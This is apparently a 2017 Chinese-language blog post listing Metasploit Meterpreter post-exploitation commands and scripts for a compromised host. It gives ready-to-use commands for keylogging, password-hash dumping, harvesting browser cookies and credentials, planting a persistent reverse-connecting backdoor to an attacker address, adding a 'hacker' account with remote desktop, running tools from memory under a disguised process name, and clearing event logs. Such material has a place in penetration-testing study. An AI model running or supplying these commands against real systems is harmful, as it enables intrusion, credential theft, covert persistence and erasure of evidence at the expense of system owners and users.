meterpreter常用命令+脚本

如题

meterpreter常用命令+脚本

常用命令

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
1、background
返回,把meterpreter后台挂起
2、sessions
-u 将shell会话提升为meterpreter会话
-v 以详细模式列出会话
-x 增加扩展信息展示
-l 查看已经成功获取的会话
-i 与指定的会话进行交互,即切换到指定id的会话
-k 杀掉指定id的会话
-K 杀掉所有会话
-C 执行一个meterpreter的命令
-c 执行一个meterpreter的命令,需指定id
-s 执行一个脚本,指定id
3、shell
获取目标主机的远程命令行shell,使用exit退出回到meterpreter
4、cat
查看目标主机上的文档内容
cat c:\\boot.ini 或c:/boot.ini 查看主机启动引导信息
5、getwd与getlwd
获取肉鸡的当前目录 和 获取本机的当前目录
6、upload
上传文件到肉鸡
upload nc.exe c:/windows/system32/
7、download
下载文件到本地
download c:\\boot.ini /root/
8、edit
调用vi编辑器,对目标主机上的文件进行修改
edit c:\\windows\\system32\\drivers\\etc\\hosts
9、search
在肉鸡上搜索文件
search -d c:/ -f *.doc
10、ipconfig
查看ip地址
11、portfwd
端口转发
portfwd add -l 1234 -p 3389 -r 192.168.86.136,远程登录 0.0.0.0:1234 即可
12、route
显示肉鸡上的路由表
13、getuid
查看当前用户
14、sysinfo
查看系统信息
15、ps
查看肉鸡上运行的进程
16、migrate
将meterpreter会话移至到另一个进程
17、execute
让肉鸡运行某个程序
-f 使用时需要加上
-H 后台执行
-a 传递给命令的参数
-c 交互命令时使用
-i 进程创建之后进行交互
-m 从内存执行
例:execute -H -m -d notepad.exe -f wce.exe -a "-o wce.txt"
-d 在肉鸡执行时显示的进程名称(用来伪装),-m直接从内存中执行,"-o wce.txt"是wce.exe的运行参数
18、getpid
获取meterpreter的进程id
19、shutdown
关机
20、post/windows/gather/forensics/enum_drives
可获取目标主机存储器信息
run post/windows/gather/forensics/enum_drives
21、checkvm
确定主机是否是一台虚拟机
run checkvm
22、persistence
植入后门程序
run persistence -X -i 5 -p 4444 -r 192.168.20.186
-X 在肉鸡上开机自启动
-i 不断尝试反向连接的时间间隔
-r lhost
-p lport
23、metsvc
将payload安装为服务(meterpreter),会建立一个端口成为服务器
run metsvc
24、getgui
开启目标主机远程桌面,添加账号
run getgui -e 开启远程桌面
run getgui -u hacker -p hacker 添加用户
25、getsystem
提升权限到system
26、keyscn
键盘记录器
keyscan_start 开始键盘记录
keyscan_stop 停止键盘记录
keyscan_dump 下载键盘记录
27、hashdump
获取账号密码
28、post/windows/gather/enum_applications
获取肉鸡上的软件安装信息
run post/windows/gather/enum_applications
29、post/windows/gather/dumplinks
获取肉鸡最近访问过的文档、链接信息
run dumplinks
30、post/windows/gather/enum_ie
读取目标主机IE浏览器cookies等缓存信息
run post/windows/gather/enum_ie
31、get_local_subnets
查看已拿下的目标主机的内网IP段情况
run get_local_subnets
32、clearev
痕迹擦除

好用脚本

路径:(/usr/share/metasploit-framework/scripts/meterpreter):

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
checkvm 检查是否是虚拟机
vnc 上传一个vnc服务到对方机器,然后在本地打开vnc服务并连接
autoroute 可以添加,删除,显示路由表
get_application_list 获取安装的程序列表
enum_firefox 获取firefox中的信息
arp_scanner 存活主机扫描(常用在内网) run arp_scanner -r 192.168.86.0/24
get_env 获取环境变量
credcollect 获取主机上的hash等凭证
getgui 可以开启远程桌面服务,添加用户,端口转发 run getgui -f 12345 -e(3389转发到12345) run getgui -u hacker -p hacker (添加用户)
dumplinks 文件操作记录(时间戳、文件位置、共享名、序列号等)
duplicate 再次产生payload,注入到其他进程或打开新进程注入
credcollect 收集主机的hash凭证
metsvc 将payload安装为服务(meterpreter),会建立一个端口成为服务器
persistence 建立一个持久性的后门
hostsedit 操作hosts文件
keylogrecorder 内置此功能
winenum 自动运行多种命令,将命令结果保存到本地
hashdump 与meterpreter的hashdump一样
win32-sshserver 安装openssh服务(Linux)
enum_logged_on_users 列出当前登陆的用户
getvncpw 获取vnc密码

本文标题:meterpreter常用命令+脚本

文章作者:暮沉沉

发布时间:2017年09月16日 - 18:09

最后更新:2017年09月16日 - 18:09

原始链接:http://maplege.github.io/2017/09/16/meterpreterCommand/

许可协议: 署名-非商业性使用-禁止演绎 4.0 国际 转载请保留原文链接及作者。

-------------本文结束感谢您的阅读-------------